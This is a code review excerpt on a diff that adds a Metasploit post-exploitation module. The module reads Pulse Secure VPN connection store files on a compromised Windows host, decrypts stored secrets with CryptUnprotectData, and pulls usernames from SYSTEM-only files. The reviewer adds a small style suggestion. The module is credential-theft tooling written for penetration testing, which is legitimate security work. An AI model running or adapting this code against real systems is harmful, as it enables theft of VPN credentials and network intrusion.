modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,369 @@
+      len, addr = ret['pDataOut'].unpack('V2')
+    else
+      # Convert using rex, basically doing: [mem & 0xffffffff, mem >> 32].pack("VV")
+      addr = Rex::Text.pack_int64le(mem)
+      len = Rex::Text.pack_int64le(data.length)
+
+      eaddr = Rex::Text.pack_int64le(emem)
+      elen = Rex::Text.pack_int64le(entropy.length)
+
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 16)
+      p_data = ret['pDataOut'].unpack('VVVV')
+      len = p_data[0] + (p_data[1] << 32)
+      addr = p_data[2] + (p_data[3] << 32)
+    end
+    return '' if len == 0
+
+    return process.memory.read(addr, len)
+  end
+
+  # Parse IVEs definitions from Pulse Secure Connect client connection store
+  # files. Each definition is converted into a Ruby hash holding a connection source,
+  # a friendly name, a URI, and an array of credentials. These Ruby hashes are stored
+  # into another Ruby hash, indexed by IVE identifiers.
+  #
+  # @return [hash] A Ruby hash indexed by IVE identifier
+  #
+  def find_ives
+    connstore_paths = [
+      'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\connstore.dat',
+      'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\connstore.bak',
+      'C:\\ProgramData\\Pulse Secure\\ConnectionStore\\connstore.tmp'
+    ]
+    begin
+      ives = {}
+      connstore_paths.each do |path|
+        if !session.fs.file.exist?(path)
+          next
+        end
+        connstore_file = session.fs.file.open(path) rescue nil
+        next if connstore_file.nil?
+
+        connstore_data = connstore_file.read.to_s
+        matches = connstore_data.scan(/ive "([a-z0-9]*)" {.*?connection-source: "([^"]*)".*?friendly-name: "([^"]*)".*?uri: "([^"]*)".*?}/m)
+        matches.each do |m|
+          ives[m[0]] = {}
+          ives[m[0]]['connection-source'] = m[1]
+          ives[m[0]]['friendly-name'] = m[2]
+          ives[m[0]]['uri'] = m[3]
+          ives[m[0]]['creds'] = []
+        end
+      end
+      return ives
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
+  end
+
+  # Pulse Secure Connect client service creates two files for each user that
+  # established a VPN connection at some point in time. The filename contains
+  # the user SID, with '.dat' or '.bak' as suffix.
+  #
+  # These files are only readable by SYSTEM and contains connection details
+  # for each IVE the user connected with. We use these details to extract
+  # the actual username used to establish the VPN connection if the module
+  # was run as the SYSTEM user.
+  #
+  # @return [String, nil] the username used by user linked to `sid` when establishing
+  # a connection with IVE `ive_index`, nil if none.
+  #
+  def get_username(sid, ive_index)
+    paths = [
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.dat",
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.bak",
+    ]
+    begin
+      if !is_system?
+        return nil
+      end
```

Comment:
This is effectively a guard clause for the method and `nil` is the default return value.

```suggestion
      return unless is_system?
```